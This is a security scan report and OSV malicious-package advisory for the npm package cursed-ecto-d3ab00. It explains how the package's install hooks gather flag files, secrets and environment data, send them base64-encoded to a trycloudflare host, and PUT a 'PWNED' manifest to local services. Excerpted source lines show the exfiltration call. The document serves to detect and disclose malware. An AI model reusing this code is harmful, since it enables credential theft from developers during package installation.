registry  /  cursed-ecto-d3ab00  /  1.0.0

cursed-ecto-d3ab00@1.0.0

ecto

AI Security Review

scanned 7d ago · by lpm-firewall-ai

The package executes malicious code during npm lifecycle hooks. It harvests secrets and environment data, exfiltrates them externally, and attempts to mutate local services.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install or package preparation lifecycle execution
Impact
Credential/secret exposure and unauthorized mutation of local/container services.
Mechanism
install-time secret harvesting, exfiltration, and localhost API PUTs
Attack narrative
On install or prepare, each lifecycle script executes shell commands to collect flag-like files, secrets, environment variables, and host identity. It encodes the data, sends it to a trycloudflare endpoint, then attempts PUT requests against many localhost/container hostnames to create or overwrite an ECT-839201 module manifest containing the encoded payload.
Rationale
Source inspection confirms repeated install-time credential/secret harvesting, external exfiltration, and unauthorized local API mutation with no package-aligned purpose. This is concrete malicious behavior reachable from npm lifecycle hooks.
Evidence
package.jsonpreinstall.jsinstall.jspostinstall.jsprepare.jsindex.js/flag*/root/flag*/flag.txt/app/flag*/srv/flag*/home/*/flag*/flag/run/secrets/*
Network endpoints12
forward-amber-prairie-ruled.trycloudflare.com/x?d=127.0.0.1:3000/api/modules/ECT-839201127.0.0.1:8080/api/modules/ECT-839201127.0.0.1:80/api/modules/ECT-839201127.0.0.1:5000/api/modules/ECT-839201127.0.0.1:4000/api/modules/ECT-839201localhost:3000/api/modules/ECT-839201app:3000/api/modules/ECT-839201web:3000/api/modules/ECT-839201frontend:3000/api/modules/ECT-839201console:3000/api/modules/ECT-839201ecto:3000/api/modules/ECT-839201

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10061
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in cursed-ecto-d3ab00 (npm)
Details
The package has no legitimate functionality (index.js is an empty module) and exists solely to run an install-time attack payload. All four lifecycle hooks (preinstall.js, install.js, postinstall.js, prepare.js) execute the same shell command via child_process.execSync that recursively scans host filesystem paths (/app, /opt, /root, /home, /srv, /data, /var, /etc, /tmp, /flag*, /) for HTB{...} flag patterns, enumerates flag-named files with their contents, captures env, hostname, id, and pwd, base64-encodes the collected data, and exfiltrates it via HTTPS GET to a hardcoded Cloudflare quick-tunnel endpoint at forward-amber-prairie-ruled.trycloudflare.com. In addition, each lifecycle script fans out HTTP PUT requests to internal hostnames and loopback ports (127.0.0.1:3000/8080/80/5000/4000 and hostnames app, web, frontend, console, ecto, registry, backend, nginx) targeting path /api/modules/ECT-839201 with a crafted ecto_module manifest named PWNED, attempting to register a malicious module on adjacent services reachable from the install environment. Behavior fires unconditionally on npm install.

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json defines preinstall/install/postinstall/prepare lifecycle hooks executing local JS files.
  • preinstall.js, install.js, postinstall.js, and prepare.js run child_process.execSync to read flag-like files, /run/secrets/*, env values, hostname, id, and pwd.
  • Lifecycle scripts base64-encode harvested host/secret data and send it to https://forward-amber-prairie-ruled.trycloudflare.com/x?d=...
  • Lifecycle scripts PUT a manifest named PWNED with encoded data to multiple localhost/container service endpoints at /api/modules/ECT-839201.
Evidence against
  • index.js only exports an empty object.
  • No benign package functionality explains install-time secret harvesting or local service mutation.
Behavioral surface
Source
ChildProcessNetworkShell
Supply chain
UrlStrings
Manifest
NoLicense
scanned 5 file(s), 5.79 KB of source, external domains: forward-amber-prairie-ruled.trycloudflare.com

Source & flagged code

7 flagged · loading source
package.jsonView file
scripts.install = node install.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.preinstall = node preinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
scripts.install = node install.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
preinstall.jsView file
2try{ L3: var cp=require('child_process'); L4: var out=''; ... L7: var msg=('STAGE=preinstall HOST='+host+' FLAG='+out).slice(0,700); L8: var b=Buffer.from(msg).toString('base64'); L9: try{require('https').get('https://forward-amber-prairie-ruled.trycloudflare.com/x?d='+b,function(){}).on('error',function(){});}catch(e){} L10: try{require('http').get('https://forward-amber-prairie-ruled.trycloudflare.com/x?d='+b,function(){}).on('error',function(){});}catch(e){} ... L14: var body=JSON.stringify({manifest:'ecto_module:\n name: PWNED\n version: 1.0.0\n power_level: '+b+'\n'}); L15: hosts.forEach(function(h){try{var r=http.request({host:h[0],port:h[1],path:'/api/modules/ECT-839201',method:'PUT',headers:{'Content-Type':'application/json','Content-Length':Buffer... L16: }catch(e){}
Critical
Command Output Exfiltration

Source executes local commands and sends command output to an external endpoint.

preinstall.jsView on unpkg · L2
2Trigger-reachable chain: scripts.preinstall -> preinstall.js L2: try{ L3: var cp=require('child_process'); L4: var out=''; ... L7: var msg=('STAGE=preinstall HOST='+host+' FLAG='+out).slice(0,700); L8: var b=Buffer.from(msg).toString('base64'); L9: try{require('https').get('https://forward-amber-prairie-ruled.trycloudflare.com/x?d='+b,function(){}).on('error',function(){});}catch(e){} L10: try{require('http').get('https://forward-amber-prairie-ruled.trycloudflare.com/x?d='+b,function(){}).on('error',function(){});}catch(e){} ... L14: var body=JSON.stringify({manifest:'ecto_module:\n name: PWNED\n version: 1.0.0\n power_level: '+b+'\n'}); L15: hosts.forEach(function(h){try{var r=http.request({host:h[0],port:h[1],path:'/api/modules/ECT-839201',method:'PUT',headers:{'Content-Type':'application/json','Content-Length':Buffer... L16: }catch(e){}
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

preinstall.jsView on unpkg · L2
2try{ L3: var cp=require('child_process'); L4: var out='';
High
Child Process

Package source references child process execution.

preinstall.jsView on unpkg · L2

Findings

2 Critical3 High5 Medium4 Low
CriticalCommand Output Exfiltrationpreinstall.js
CriticalTrigger Reachable Dangerous Capabilitypreinstall.js
HighInstall Time Lifecycle Scriptspackage.json
HighChild Processpreinstall.js
HighShell
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumStructural Risk Force Deep Review
LowNon Install Lifecycle Scripts
LowScripts Present
LowUrl Strings
LowNo License